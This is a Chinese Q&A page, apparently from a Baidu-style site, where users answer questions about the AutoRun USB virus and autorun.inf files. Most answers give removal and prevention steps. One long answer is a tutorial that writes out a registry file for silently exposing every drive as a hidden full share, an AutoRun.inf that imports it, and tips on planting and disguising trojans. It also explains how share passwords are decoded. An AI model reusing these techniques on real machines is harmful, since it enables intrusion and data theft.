barriers / 阅读 / 详情

virus.win32.AutoRun.ji是什么病毒

2023-08-02 16:55:44
共1条回复
瑞瑞爱吃桃
* 回复内容中包含的链接未经审核,可能存在风险,暂不予完整展示!
autorun.inf这个问题回答的手都累了~~
virus.win32.AutoRun.ji是U盘病毒呀~
你看看很恶心的~居然伪装成信息加载....受不了了....
烁烁杀掉U盘中的病毒的方法~~~
对移动存储设备,中毒,把文件夹选项中隐藏受保护的操作系统文件钩掉,点上显示所有文件和文件夹,点击确定,然后在移动存储设备中会看到如下几个文件,virus.win32.AutoRun.ji~都删除掉,还有一个后缀为tmp的文件,也可以删除,完成后,病毒就清除了。

小小补充:
就是在删除virus.win32.AutoRun.ji文件时,直接删可能会删不掉的,要先到进程管理那了先结束再删除这文件,如果还不行就到安全模式里删,这样就一定行。

呵呵~~
不要以为这个是小小的病毒,它是不知不觉的在后台运行的,它长期会占用你差不多20M内存,它随系统启动。它会莫名奇妙的使你的计算机在沉默中死亡。这个病毒任你格式化U盘也格不掉,用很多杀毒软件也奈它不何。一般让你看不出来,不信你可以把U盘插入电脑中再把“文件夹选项中隐藏受保护的操作系统文件钩掉”,看看。。多出了不明的文件,那你就是中招了!有空检查一下你的U盘吧~~~

gei你专杀~~~分分送来~!!~
Autorun病毒防御者 2.0.2.530
Autorun病毒防御者软件是专门针对流行的U盘病毒和部分木马开发的查杀程序。它独有的精确查杀与扩展查杀双查杀机制能够彻底清除病毒和木马的相关文件和残余,不留痕迹。此外,软件还有U盘病毒免疫、系统修复、残余清理、病毒分析与诊断、U盘解锁、U盘软件写保护等一系列完整的辅助工具,能够让您彻底远离U盘病毒的困扰。

本软件绿色、免费,体积小巧,查杀和清除能力强。是您查杀U盘病毒的好助手!

* 2007-10-08 更新到2.0.2.530正式版

- 增加“病毒现身!”的反向操作“病毒隐身!”功能。
- DLL反注入清理引擎增强,现在可以将绝大部分DLL病毒反注入后清除。
- 注册表删除引擎增强,现在可以将以前不能顺利清除的病毒注册表也清理出去。
- 病毒智能分析工具增强检测,现在将会对所有关联文件进行相关性检查。
http://www.o********.net/soft/56964.htm
auto病毒专杀工具下载:
http://www.p**.com/Soft/rjxz/200612/61.html

878D2B28.exe .你可以下载 unlocker:http://www.o********.net/soft/24732.htm,安装后,首先从任务管理器里把可疑病毒进程结束,然后找到病毒文件(杀软、360等会给出病毒路径,可能需要显示隐藏文件),右键用unlocker删除

本人最近关于木马的解答~原创%哈~看后你自己拿捏谁回答的更好~
http://zhidao.b***.com/question/38019001.html
http://zhidao.b***.com/question/37940865.html
http://zhidao.b***.com/question/37599445.html
http://zhidao.b***.com/question/37675620.html
http://zhidao.b***.com/question/37620871.html
http://zhidao.b***.com/question/37400202.html
http://zhidao.b***.com/question/37553900.html
http://zhidao.b***.com/question/37430572.html
http://zhidao.b***.com/question/37610044.html
http://zhidao.b***.com/question/37273760.html
http://zhidao.b***.com/question/36315756.html
分分送来~~!~~呵呵~以后我也好帮你!~

相关推荐

autorun是什么意思?

autorun是什么意思?autorun的意思是自动运行,一般在电脑的文件夹中有AUTORUN.INF这个文件都是设置了自动运行一些程序,如果是自己了解的程序还可以,如果是突然出现的,一般要小心了,因为容易中木马或病毒。autorun一般用记事本打开。如果盘内有来路不明的文件,尤其是文件名比较诱惑人的文件,必须多加小心;需要特别提示的是,不要看到图标是文件夹就理所当然是文件夹,不要看到图标是记事本就理所当然是记事本,伪装图标是病毒惯用伎俩。autorun.inf是电脑使用中比较常见的文件之一 ,其作用是允许在双击磁盘时自动运行指定的某个文件。但是近几年出现了用autorun.inf文件传播木马或病毒,它通过使用者的误操作让目标程序执行,达到侵入电脑的目的,带来了很大的负面影响。autorun.inf文件是从Wind ows 95开始的,最初用在其安装盘里,实现自动安装,以后的各版本都保留了该文件并且部分内容也可用于其他存储设备。
2023-08-02 00:00:251

autorun是什么意思

autorun——自动运行
2023-08-02 00:00:352

autorun是什么?和那个setup也是什么?

应该是中毒了,先杀一下毒试试,如果...AutoRun.inf的作用是允许在双击磁盘时自动运行指定的某个文件。setup.exe是...你的这个setup.exe文件为木马病毒就是远
2023-08-02 00:00:432

Autorun是什么 ?

是病毒,如果造成不能使系统正常运行的文件就可以认为是病毒,因为他干扰了我们的正常使用,这个文本他的作用就是不能正常打开盘符,而且顽固的很,不是一般手段就能删的掉的,所以我们说他是病毒,其实也只是一个代称而已.
2023-08-02 00:00:581

auto和autorun是什么东西!

用ROSE专杀,用百度搜,下一个运行,OK
2023-08-02 00:01:417

autorun是什么啊??

自动运行的意思
2023-08-02 00:02:394

手机里的“mrapp”和“Autorun”是什么意思?有什么作用?可以做什么?

mrapp是展讯平台的标志,可以下软件。后者是一个内存卡防病毒文件,无须担心
2023-08-02 00:04:202

Autorun是什么,在哪里可以找到。

Autorun决定了是否执行CDROM或硬盘的AutoRun功能。大多数的硬盘根目录下并不需要AutoRun.inf文件来运行程序,因此完全可以将硬盘的AutoRun功能关闭,这样即使在硬盘根目录下有AutoRun.inf这个文件,Windows也不会去运行其中指定的程序,从而可以达到防止黑客利用AutoRun.inf文件入侵的目的。
2023-08-02 00:05:363

Autorun.inf是什么文件夹

病毒
2023-08-02 00:07:0014

autorun.inf 是干什么用的?

自动启动的
2023-08-02 00:09:133

最近我电脑里不知不觉多了一个autorun.inf的文件夹,是什么回事?

看一下文件是不是空的?如果是,可能是一些杀毒工具的免疫文件。没事的。
2023-08-02 00:09:212

autorun.inf是什么!

这是一个自动运行的文件夹很多病毒都有。你最好下个杀软杀杀。要不就要重装系统了
2023-08-02 00:09:293

什么是Autorun病毒 是指专门的哪一只病毒吗

老大 病毒不是按"只"计算的....
2023-08-02 00:09:372

autorun.inf是什么

自动播放的配置文件
2023-08-02 00:09:463

电脑中每个盘里都有autorun.inf 是隐藏文件 也不能删除 它是什么?

中了Autorun病毒,到360下个Autorun专杀!
2023-08-02 00:10:028

autorun.inf是什么,autorun.inf删除不掉是怎么回事

auturun.inf是用来定义光盘自动播放的配置文件,后来auturun.inf被越来越多的U盘病毒利用。当在U盘或本地硬盘根目录下发现autorun.inf时,通常表示,这台电脑已经被U盘病毒入侵。为防止U盘病毒泛滥,有部分安全工具会创建一些不可修改的auturun.inf文件夹,试图阻止U盘病毒继续传播,这被称之为U盘免疫功能。这种auturun.inf文件夹,就可能删不掉。U盘病毒利用操作系统的自动播放功能传播,早期其特点是插入U盘的动作即可立即运行U盘病毒。这是病毒写入U盘时,创建特定的autorun.inf所致。通常,如果在非光盘路径下发现auturun.inf,这个open=后面的exe文件极可能是病毒。如果中了U盘病毒,可能在任何磁盘分区根目录下发现autorun.inf。U盘病毒有时,也被网民称为Auto病毒。
2023-08-02 00:10:161

Autorun.inf是什么意思啊?

不是病毒就行了。U盘免疫文件迩隐藏就行了。给点分吧,穷啊。
2023-08-02 00:10:243

AUTORUN.INF文件夹是什么?

这个是病毒`你可以加我QQ我给你传专杀
2023-08-02 00:10:3214

在我的电脑里有这么个隐藏文件 autorun.inf 这是什么?是病毒吗?

是病毒,最好升级杀毒。要不你删了还有
2023-08-02 00:11:084

电脑里面autorun.dbc文件夹是什么东东?

最佳答案VBS/Autorun.b.Wsh病毒名称:VBS/Autorun.b.Wsh中文名:“U盘幽灵”变种b病毒长度:可变病毒类型:脚本病毒危害等级:★★影响平台:Win9X/ME/NT/2000/XP/2003VBS/Autorun.b.Wsh“U盘幽灵”变种b是一个采用VBScript脚本语言编写的脚本病毒,由autorun.exe、autorun.reg、autorun.vbs、autorun.bat等多个病毒文件组成,利用U盘和移动硬盘等方式进行传播。“U盘幽灵”变种b运行后,自我释放到%SystemDir%系统文件夹里,并利用Windows系统的自动播放功能自动运行“U盘幽灵”变种b。监视用户计算机上是否有U盘或移动硬盘接入被感染的计算机,一旦发现便自动复制到U盘和移动硬盘里,从而扩大传播范围。占用大量CPU资源,使电脑运行速度明显变慢。
2023-08-02 00:11:222

autorun.inf文件是什么文件,如何删除autorun.inf文件?

其实 autorun.inf文件   U盘杀毒专家USBKiller可以对指定盘符进行免疫,生成autorun.inf文件,这样病毒就难以生成autorun.inf文件夹。选择免疫的磁盘单机开始免疫,就可以在相应的磁盘下生成autorun.inf文件,免疫病毒了。     这样经过软件生成的免疫文件是不是那么容易删除的。很多人免疫过之后,又担心是不是病毒生成的文件,想要删除这个文件,但又无法删除。于是很多人误认为是病毒感染,其实这个是因为由软件生成的,所以手动是无法删除的。这时候只要我们选定需要取消免疫的磁盘。然后点击u2018取消免疫u2019按钮。
2023-08-02 00:11:291

磁盘设置autorun.inf文件夹免疫是什么意思?是否要设置?大神们帮帮忙

到底是文件夹还是文件?这是2个不同的概念。 1、autorun.inf文件夹,那是免疫病毒的,是好东西,有了这个你U盘就不会中毒了。由于你安装了瑞星和380,瑞星卡卡或360都会在你插入得u盘上建立该文件夹。 2、autorun.inf文件才是U盘病毒,如果还有个autorun.exe,那就是确定有病毒了。 双击无法打开硬盘与Autorun.inf 清除方法: 第一步:Autorun.inf基本由U盘等移动贮存工具带到你的计算机上的。所以要对你用的U盘等进行病毒杀除 请下载U盘病毒专杀USBCleaner 下载地址:http://download.pchome.net/utility/antivirus/others/download_38273.html 第二步: (一)杀毒工具清楚: 下载Autorun删除工具1.0, 下载地址:http://www.fzpchome.com/Soft/jbh123Soft/200703/Autorun.rar (二)手动清除病毒:(注意不要双击打开本地硬盘。不然以下操作全部白做。) 1.打开"我的电脑" 2.选择"工具"菜单中的"文件夹选项" 3.选择"查看"项 4."显示所有文件和文件夹"前面打个钩 5."隐藏受保护的操作系统文件(推荐)"前面的钩取掉,并且要"确定" 6.然后打开所有的磁盘区!(必须要右键打开所有的哦!打开C盘,打开D盘,打开E盘,打开F盘) 7.全部打开了以后,你在个个磁盘区中发现名为autorun的文件,你把它删除! 8.所有磁盘区中的AUTORUN删了。 *基本在这样的情况下可以解决该顽固问题,如果还不行,可以去下载360安全卫士试试。 下载地址:http://down.360safe.com/setup.exe
2023-08-02 00:11:361

autorun.pnf是什么文件,是不是病毒

可能是病毒,或是预处理文件?
2023-08-02 00:11:443

[autorun] open=setup.exe icon=logo.ico是什么东西

这是运用程序的标志
2023-08-02 00:11:512

AutoRun是什么?要开启吗?

见autorun就病毒真是sb。autorun是自动运行程序!如果是光盘U盘的autorun建议楼主关闭!
2023-08-02 00:11:591

autorun.ini是什么文件啊

autorun.inf文件是从Windows95开始的,最初用在其安装盘里,实现自动安装,以后的各版本都保留了该文件并且部分内容也可用于其他存储设备。是我们电脑使用中比较常见的文件之一 ,其作用是允许在双击磁盘时自动运行指定的某个文件。但是近几年出现了用autorun.inf文件传播木马或病毒,它通过使用者的误操作让目标程序执行,达到侵入电脑的目的,带来了很大的负面影响。
2023-08-02 00:12:092

什么是AUTORUN病毒,它对电脑有什么危害呢?

您好:建议您安装瑞星杀毒软件V16版本升级到最新病毒库后,重启计算机按F8键选择安全模式,进行全盘病毒扫描查杀,之后使用瑞星安全助手进行电脑修复,下载地址:http://pc.rising.com.cn/
2023-08-02 00:12:172

病毒名称为:Worm.win32.Autorun.eyr是什么病毒?怎样杀死它?谢谢!

蠕虫病毒,下个专杀蠕虫就可以了
2023-08-02 00:12:274

AutoRun是什么程序?自动运行时对计算机有什么危害吗?

AUTORUN是U盘等移动硬盘自动播放功能、系统自带的,通俗点就是说如果你现在拿着一个带U盘病毒的U盘连接到你的电脑,你的电脑就会感染上U盘病毒,但是如果你把这个功能禁用的话,只要你不去双击这个U盘病毒的运行程序,你的电脑就不会感染这个病毒还有建议用360安全卫士代替金山清理专家,很好用的,1 关掉AUTORUN这个功能 2优化开机启动程序,可以考虑用超级兔子3 卸载多余的第三方插件,强烈建议使用360安全卫士,会帮你彻底删干净这些垃圾插件的
2023-08-02 00:12:503

realtek usb disk autorun1.0是什么

AutoRun是自动运行,是微软的windows系统的一种自动运行的文件命令,主要用于对于移动设施的自动运行。 本是微软为了方便用户使用CDROM等移动设施而设置的程序,而现在却被很多病毒利用,所以一旦用户发现来源不明的AutoRun.exe或者AutoRun.inf文件时一定要注意,要及时用杀毒软件查杀,避免因此遭受损失。
2023-08-02 00:13:031

autoruno是什么

autoruno?是autorun吧....AutoRun,正如其字面意思,自动运行,是微软的windows系统的一种自动运行的文件命令,主要用于对于移动设施的自动运行,本是微软为了方便用户使用CDROM等移动设施而设置的程序,而现在却被很多病毒利用,所以一旦用户发现来源不明的AutoRun.exe或者AutoRun.inf文件时一定要注意,要及时用反病毒软件查杀,避免因此遭受损失。可能是病毒,u盘病毒auto病毒主要表现在: 1、在系统中占用大量cpu资源。 2、在每个分区下建立rose.exe autorun.inf 2个文件,双击该盘符时显示自动运行,但无法打开该分区。 3、大部分通过U盘、移动硬盘等存储设备传播。对网络危害还在发现过程当中。 4、可能会引起部分操作系统崩溃,表现在开机自检后直接并反复重启,无法进入系统。 由于某些原因,各种杀毒软件均没有提供相应的病毒库,导致无法通过杀毒软件查杀该病毒。现网络中心提供手动杀毒方式,具体如下: 1、调出任务管理器,在进程页面中结束掉所有名称为Rose.exe的进程(建议在后面的操作中反复此操作,以确保病毒文件不会反复发作)。 2、在开始--运行中输入“regedit”(XP系统)打开注册表,查找所有的“rose.exe”键值项,找到后将整个shell子键删除。 3、在我的电脑-工具-文件夹选项-查看-显示所有文件和文件夹,把“隐藏受保护的系统文件”的勾去掉。 4、对每个盘符点右键-打开进入(切记不能双击),删掉所有的rose.exe和autorun.inf文件。 5、在c:windowssystem32下查找有没有rose.exe文件,如果存在就直接删掉。 你问得太笼统了....
2023-08-02 00:13:121

Autorun.inf是什么文件夹

病毒
2023-08-02 00:13:2114

请问:"autorun.inf"是什么文件夹?

病毒
2023-08-02 00:13:535

Autorun.inf是什么?扩展名是bat的又是什么东西?

你看清楚Autorun.inf是文件还是文件夹,如果是文件夹,那就正常;如果是文件那就是病毒。你说“这次删了下次又自己出来了 ”,可能是因为你把MP5经常插到电脑上,因为:如果你装了360安全卫士等安全工具,360安全卫士会在MP5中自动建立一个叫Autorun.inf的文件夹,以防止病毒从U盘自动运行。bat是“批处理”文件的扩展名,bat全称是batch(一批),bat的作用是一次可以执行多条命令,完成多项功能。
2023-08-02 00:14:111

System Volume Information是什么啊?还有autorun.inf是什么文件啊?

说得好,顶一下
2023-08-02 00:14:183

AutoRun是什么?电脑提示其自动运行被启用,怎么防止它运行?

自动运行程序,不一定是病毒,但病毒的可能性大。最好禁止U盘、光盘灯自动运行即可,防止病毒运行...
2023-08-02 00:14:274

U盘中隐藏着的文件“autorun”是什么?有什么用?

这个好像是用来做背景的,你可以删掉没关系,另:他的后缀是不是 .ini 或者 .inl ??
2023-08-02 00:14:553

autorun.inf文件是什么文件,如何删除autorun.inf文件?

其实 autorun.inf文件   U盘杀毒专家USBKiller可以对指定盘符进行免疫,生成autorun.inf文件,这样病毒就难以生成autorun.inf文件夹。选择免疫的磁盘单机开始免疫,就可以在相应的磁盘下生成autorun.inf文件,免疫病毒了。     这样经过软件生成的免疫文件是不是那么容易删除的。很多人免疫过之后,又担心是不是病毒生成的文件,想要删除这个文件,但又无法删除。于是很多人误认为是病毒感染,其实这个是因为由软件生成的,所以手动是无法删除的。这时候只要我们选定需要取消免疫的磁盘。然后点击u2018取消免疫u2019按钮。
2023-08-02 00:15:071

mp4里的autorun.inf文件内容是什么意思啊?

自动运行.RECYCLERauto.exe 的意思就是就是你在把MP4插进电脑的时候 会自动运行1个文件 估计是MP4 自带的文件 一般是驱动或者拷贝系统 用处不会太大
2023-08-02 00:15:184

优盘中出现Autorun.inf是什么意思??

autorun.inf是我们电脑使用中比较常见的文件之一,其作用是允许在双击磁盘时自动运行指定的某个文件。但是近几年出现了用autorun.inf文件传播木马或病毒,它通过使用者的误操作让目标程序执行,达到侵入电脑的目的,带来了很大的负面影响。
2023-08-02 00:15:382

Autorun 病毒有什么危害?

也没有太大的危害,只是不可以双击打开盘,不可以查看隐藏文件而已.
2023-08-02 00:15:452

我电脑C,D,E,F盘里都有这个autorun.inf这个病毒文件,请问有什么办法将他删除

最近网上流行通过AutoRun.inf文件使对方所有的硬盘完全共享或中木马的方法,由于AutoRun.inf文件在黑客技术中的应用还是很少见的,相应的资料也不多,有很多人对此觉得很神秘,本文试图为您解开这个迷,使您能完全的了解这个并不复杂却极其有趣的技术。 一、理论基础 经常使用光盘的朋友都知道,有很多光盘放入光驱就会自动运行,它们是怎么做的呢?光盘一放入光驱就会自动被执行,主要依靠两个文件,一是光盘上的AutoRun.inf文件,另一个是操作系统本身的系统文件之一的Cdvsd.vxd。Cdvsd.vxd会随时侦测光驱中是否有放入光盘的动作,如果有的话,便开始寻找光盘根目录下的AutoRun.inf文件。如果存在AutoRun.inf文件则执行它里面的预设程序。 AutoRun.inf不光能让光盘自动运行程序,也能让硬盘自动运行程序,方法很简单,先打开记事本,然后用鼠标右键点击该文件,在弹出菜单中选择“重命名”,将其改名为AutoRun.inf,在AutoRun.inf中键入以下内容:[AutoRun] //表示AutoRun部分开始,必须输入 Icon=C:C.ico //给C盘一个个性化的盘符图标C.ico Open=C:1.exe //指定要运行程序的路径和名称,在此为C盘下的1.exe 保存该文件,按F5刷新桌面,再看“我的电脑”中的该盘符(在此为C盘),你会发现它的磁盘图标变了,双击进入C盘,还会自动播放C盘下的1.exe文件! 解释一下:“[AutoRun]”行是必须的固定格式,“Icon”行对应的是图标文件,“C:C.ico”为图标文件路径和文件名,你在输入时可以将它改为你的图片文件所在路径和文件名。另外,“.ico”为图标文件的扩展名,如果你手头上没有这类文件,可以用看图软件ACDSee将其他格式的软件转换为ico格式,或者找到一个后缀名为BMP的文件,将它直接改名为ICO文件即可。 “Open”行指定要自动运行的文件及其盘符和路径。要特别说明的是,如果你要改变的硬盘跟目录下没有自动播放文件,就应该把“OPEN”行删掉,否则就会因为找不到自动播放文件而打不开硬盘,此时只能用鼠标右键单击盘符在弹出菜单中选“打开”才行。 请大家注意:保存的文件名必须是“AutoRun.inf”,编制好的Autorun.inf文件和图标文件一定要放在硬盘根目录下。更进一步,如果你的某个硬盘内容暂时比较固定的话,不妨用Flash做一个自动播放文件,再编上“Autorun”文件,那你就有最酷、最个性的硬盘了。 到这儿还没有完。大家知道,在一些光盘放入后,我们在其图标上单击鼠标右键,还会产生一个具有特色的目录菜单,如果能对着我们的硬盘点击鼠标右键也产生这样的效果,那将更加的有特色。其实,光盘能有这样的效果也仅仅是因为在AutoRun.inf文件中有如下两条语句: shell标志=显示的鼠标右键菜单中内容 shell标志command=要执行的文件或命令行 所以,要让硬盘具有特色的目录菜单,在AutoRun.inf文件中加入上述语句即可,示例如下: shell1=天若有情天亦老 shell1command=notepad ok.txt 保存完毕,按F5键刷新,然后用鼠标右键单击硬盘图标,在弹出菜单中会发现“天若有情天亦老”(图1),点击它,会自动打开硬盘中的“ok.txt”文件。注意:上面示例假设“ok.txt”文件在硬盘根目录下,notepad为系统自带的记事本程序。如果要执行的文件为直接可执行程序,则在“command”后直接添加该执行程序文件名即可。 二、实例 下面就举个例子:如果你扫到一台开着139共享的机器,而对方只完全共享了D盘,我们要让对方的所有驱动器都共享。首先编辑一个注册表文件,打开记事本,键入以下内容: REGEDIT4 "此处一定要空一行 [HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionNetworkLanmanC$] "Path"="C:\" "Remark"="" "Type"=dword:00000000 "Flags"=dword:00000302 "Parmlenc"=hex: "Parm2enc"=hex: [HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionNetworkLanmanD$] "Path"="D:\" "Remark"="" "Type"=dword:00000000 "Flags"=dword:00000302 "Parmlenc"=hex: "Parm2enc"=hex: [HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionNetworkLanmanC$] "Path"="E:\" "Remark"="" "Type"=dword:00000000 "Flags"=dword:00000302 "Parmlenc"=hex: "Parm2enc"=hex: 以上我只设置到E盘,如果对方有很多逻辑盘符的请自行设置。将以上部分另存为Share.reg文件备用。要特别注意REGEDIT4为大写且顶格书写,其后要空上一行,在最后一行记得要按一次回车键。 然后打开记事本,编制一个AutoRun.inf文件,键入以下内容: [AutoRun] Open=regedit/s Share.reg //加/s参数是为了导入时不会显示任何信息 保存AutoRun.inf文件。将Share.reg和AutoRun.inf这两个文件都复制到对方的D盘的根目录下,这样对方只要双击D盘就会将Share.reg导入注册表,这样对方电脑重启后所有驱动器就会都完全共享出来。 如果想让对方中木马,只要在AutoRun.inf文件中,把“Open=Share.Reg”改成“Open=木马服务端文件名”,然后把AutoRun.inf和配置好的木马服务端一起复制到对方D盘的根目录下,这样不需对方运行木马服务端程序,而只需他双击D盘就会使木马运行!这样做的好处显而易见,那就是大大的增加了木马运行的主动性!须知许多人现在都是非常警惕的,不熟悉的文件他们轻易的不会运行,而这种方法就很难防范了。 要说明的是,给你下木马的人不会那么蠢的不给木马加以伪装,一般说来,他们会给木马服务端文件改个名字,或好听或和系统文件名很相像,然后给木马换个图标,使它看起来像TXT文件、ZIP文件或图片文件等,,最后修改木马的资源文件使其不被杀毒软件识别(具体的方法可以看本刊以前的文章),当服务端用户信以为真时,木马却悄悄侵入了系统。其实,换个角度理解就不难了——要是您给别人下木马我想你也会这样做的。以上手段再辅以如上内容的AutoRun.inf文件就天衣无缝了!三、防范方法 共享分类完全是由flags标志决定的,它的键值决定了共享目录的类型。当flags=0x302时,重新启动系统,目录共享标志消失,表面上看没有共享,实际上该目录正处于完全共享状态。网上流行的共享蠕虫,就是利用了此特性。如果把"Flags"=dword:00000302改成"Flags"=dword:00000402,就可以看到硬盘被共享了,明白了吗?秘密就在这里! 以上代码中的Parmlenc、Parm2enc属性项是加密的密码,系统在加密时采用了8位密码分别与“35 9a 4b a6 53 a9 d4 6a”进行异或运算,要想求出密码再进行一次异或运算,然后查ASCII表可得出目录密码。在网络软件中有一款软件就利用该属性进行网络密码破解的,在局域网内从一台机器上可以看到另一台计算机的共享密码。 利用TCP/IP协议设计的NethackerⅡ软件可以穿过Internet网络,找到共享的主机,然后进行相应操作。所以当您通过Modem上网时,千万要小心,因为一不小心,您的主机将完全共享给对方了。 解决办法是把HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionNetworkLanMan下面的“C$”、“D$”、“E$”等删掉。然后删除windowssystem下面的Vserver.vxd删除,它是Microsoft网络上的文件与打印机共享虚拟设备驱动程序,再把HKEY_LOCAL_MACHINESystemCurrentControlSetServicesVxD下的Vserver键值删掉,就会很安全了。 另外,关闭硬盘AutoRun功能也是防范黑客入侵的有效方法之一。具体方法是在“开始”菜单的“运行”中输入Regedit,打开注册表编辑器,展开到HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExploer主键下,在右侧窗格中找到“NoDriveTypeAutoRun”,就是这个键决定了是否执行CDROM或硬盘的AutoRun功能。 双击“NoDriveTypeAutoRun”,在默认状态下(即你没有禁止过AutoRun功能),在弹出窗口中可以看到“NoDriveTypeAutoRun”默认键值为95,00,00,00,如图所示(图2)。其中第一个值“95”是十六进制值,它是所有被禁止自动运行设备的和。将“95”转为二进制就是10010101,其中每位代表一个设备,Windows中不同设备会用如下数值表示:设备名称 第几位 值 设备用如下数值表示 设备名称含义 DKIVE_UNKNOWN 0 1 01h 不能识别的设备类型 DRIVE_NO_ROOT_DIR 1 0 02h 没有根目录的驱动器(Drive without root directory) DRIVE_REMOVABLE 2 1 04h 可移动驱动器(Removable drive) DRIVE_FIXED 3 0 08h 固定的驱动器(Fixed drive) DRIVE_REMOTE 4 1 10h 网络驱动器(Network drive) DRIVE_CDROM 5 0 20h 光驱(CD-ROM) DRIVE_RAMDISK 6 0 40h RAM磁盘(RAM Disk) 保留 7 1 80h 未指定的驱动器类型(Not yet specified drive disk) 在上面所列的表中值为“0”表示设备运行,值为“1”表示该设备不运行(默认情况下,Windows禁止80h、10h、4h、01h这些设备自动运行,这些数值累加正好是十六进制的95h,所以NoDriveTypeAutoRun”默认键值为95,00,00,00)。由上面的分析不难看出,在默认情况下,会自动运行的设备是DRIVE_NO_ROOT_DIR、DRIVE_FIXED、DRIVE_CDROM、DRIVE_RAMDISK这四个保留设备,所以要禁止硬盘自动运行AutoRun.inf文件,就必须将DRIVE_FIXED的值设为1,这是因为DRIVE_FIXED代表固定的驱动器,即硬盘。这样一来,原来的10010101(在表中“值”列中由下向上看)就变成了二进制的10011101,转为十六进制为9D。现在,将“NoDriveTypeAutoRun”的键值改为9D,00,00,00后关闭注册表编辑器,重启电脑后就会关闭硬盘的AutoRun功能。 如果你看明白了,那你肯定知道该怎样禁止光盘AutoRun功能了,对!就是将DRIVE_CDROM设为1,这样“NoDriveTypeAutoRun”键值中的第一个值就变成了10110101,也就是十六进制的B5。将第一个值改为B5后关闭注册表编辑器,重启电脑后就会关闭CDROM的Autorun功能。如果仅想禁止软件光盘的AutoRun功能,但又保留对CD音频碟的自动播放能力,这时只需将“NoDriveTypeAutoRun”的键值改为:BD,00,00,00即可。 如果想要恢复硬盘或光驱的AutoRun功能,进行反方向操作即可。 事实上,大多数的硬盘根目录下并不需要AutoRun.inf文件来运行程序,因此我们完全可以将硬盘的AutoRun功能关闭,这样即使在硬盘根目录下有AutoRun.inf这个文件,Windows也不会去运行其中指定的程序,从而可以达到防止黑客利用AutoRun.inf文件入侵的目的。 除此以外,我们还应让Windows能显示出隐藏的共享。大家都知道,在Windows 9X中设置共享时,通过在共享名后加上“$”这个符号,可使共享隐藏。比如,我们给一个名为share的计算机的C盘设置共享时,只要将其共享名设为C$。这样我们将看不到被共享的C盘,只有通过输入该共享的确切路径,才能访问此共享。不过我们只要用将电脑中的msnp32.dll文件稍做修改。就可以让Windows显示出隐藏的共享。 由于在Windows下msnp32.dll会被调用,不能直接修改此文件,所以第一步我们要复制msnp32.dll到C盘下并改名为msnp32,msnp32.dll在C:Windowssystem文件夹下。运行UltraEdit等十六进制文件编辑器打开msnp32,找到“24 56 E8 17”(位于偏移地址00003190~000031A0处),找到后将“24”改为“00”,然后保存,关闭UltraEdit。重启计算机进入DOS模式,在命令提示符下输入copy c:msnp32.dll c:Windowssystemmsnp32.dll,重启进入Windows,现在双击share就能看见被隐藏的共享了。 最后要提醒大家利用TCP/IP协议设计的NethackerⅡ等黑客软件可以穿过Internet网络,找到共享的主机,然后进行相应操作。所以当您通过Modem上网时,千万要小心,因为一不小心,您的主机将完全共享给对方了。防范这类事情发生的方法无非是经常检查系统,给系统打上补丁,经常使用反黑杀毒软件,上网时打开防火墙,注意异常现象,留意AutoRun.inf文件的内容,关闭共享或不要设置为完全共享,且加上复杂的共享密码。 声明:本文的目的是使大家能清楚地了解网上流行的黑客手段,增强自己的防护意识,因此请大家不要用本文的方法去干违法的事情,切记:己所不欲,勿施于人!
2023-08-02 00:15:543

安国u盘量产工具模式里的普通盘,本地盘,只读盘,AES盘和Autorun都是什么?

普通盘:即U盘形式。本地盘:即本地硬盘或者像移动硬盘形式。只读盘:写入信息后(就是量产完后))只能读出再就不能写入了。即不能向里面存任何东西了。AES盘:是一般强力加密形式,一般很难解决。Autorun:是一般自动启动盘的形式,如:制作自动启动的安装U盘等。
2023-08-02 00:16:361

autorun.inf和autorun.ico是什么

例如:[autorun]icon=1.icoopen=files.exe 上述的这个autorun.inf文件的意思就是: 把1.ico作为磁盘的图标。 并在双击磁盘时,运行files.exe. autorun.ico则是一个图标文件,可以用来代替上面例子中的1.ico了。
2023-08-02 00:16:461

移动硬盘根目录下生成了autorun.inf和cdrom.exe是什么病毒?

autorun病毒感染U盘和移动硬盘自动运行病毒文件
2023-08-02 00:16:543

autorun.inf文件是什么文件,如何删除autorun.inf文件?

其实 autorun.inf文件   U盘杀毒专家USBKiller可以对指定盘符进行免疫,生成autorun.inf文件,这样病毒就难以生成autorun.inf文件夹。选择免疫的磁盘单机开始免疫,就可以在相应的磁盘下生成autorun.inf文件,免疫病毒了。     这样经过软件生成的免疫文件是不是那么容易删除的。很多人免疫过之后,又担心是不是病毒生成的文件,想要删除这个文件,但又无法删除。于是很多人误认为是病毒感染,其实这个是因为由软件生成的,所以手动是无法删除的。这时候只要我们选定需要取消免疫的磁盘。然后点击u2018取消免疫u2019按钮。
2023-08-02 00:17:011

autorun的格式是什么啊?

[autorun]OPEN=****.EXEICON=****.EXE,0
2023-08-02 00:17:113

autorun.inf是什么

自动复制运行的一个文件夹
2023-08-02 00:17:193

F盘的autorun.inf是什么文件?

用批处理轻松清掉sxs.exe和autorun.inf的专杀工具 存为del.bat,运行即可,另一个是注册表文件,可以防止病毒修改注册表无法查看隐藏文件 @echo off @echo 脚本之家 @echo sxs.exe 专杀 @echo 开始 @echo 结束病毒进程sovhost ntsd -c q -pn sovhost.exe echo 修正注册表 regedit /s del.reg echo 删除各盘病毒文件 cd c: attrib sxs.exe -a -h -s del /s /q /f sxs.exe attrib autorun.inf -a -h -s del /s /q /f autorun.inf D: attrib sxs.exe -a -h -s del /s /q /f sxs.exe attrib autorun.inf -a -h -s del /s /q /f autorun.inf E: attrib sxs.exe -a -h -s del /s /q /f sxs.exe attrib autorun.inf -a -h -s del /s /q /f autorun.inf F: attrib sxs.exe -a -h -s del /s /q /f sxs.exe attrib autorun.inf -a -h -s del /s /q /f autorun.inf G: attrib sxs.exe -a -h -s del /s /q /f sxs.exe attrib autorun.inf -a -h -s del /s /q /f autorun.inf @echo on保存为del.reg运行即可,
2023-08-02 00:17:272

msn ,autorun是什么

是的,杀毒把!!1
2023-08-02 00:17:462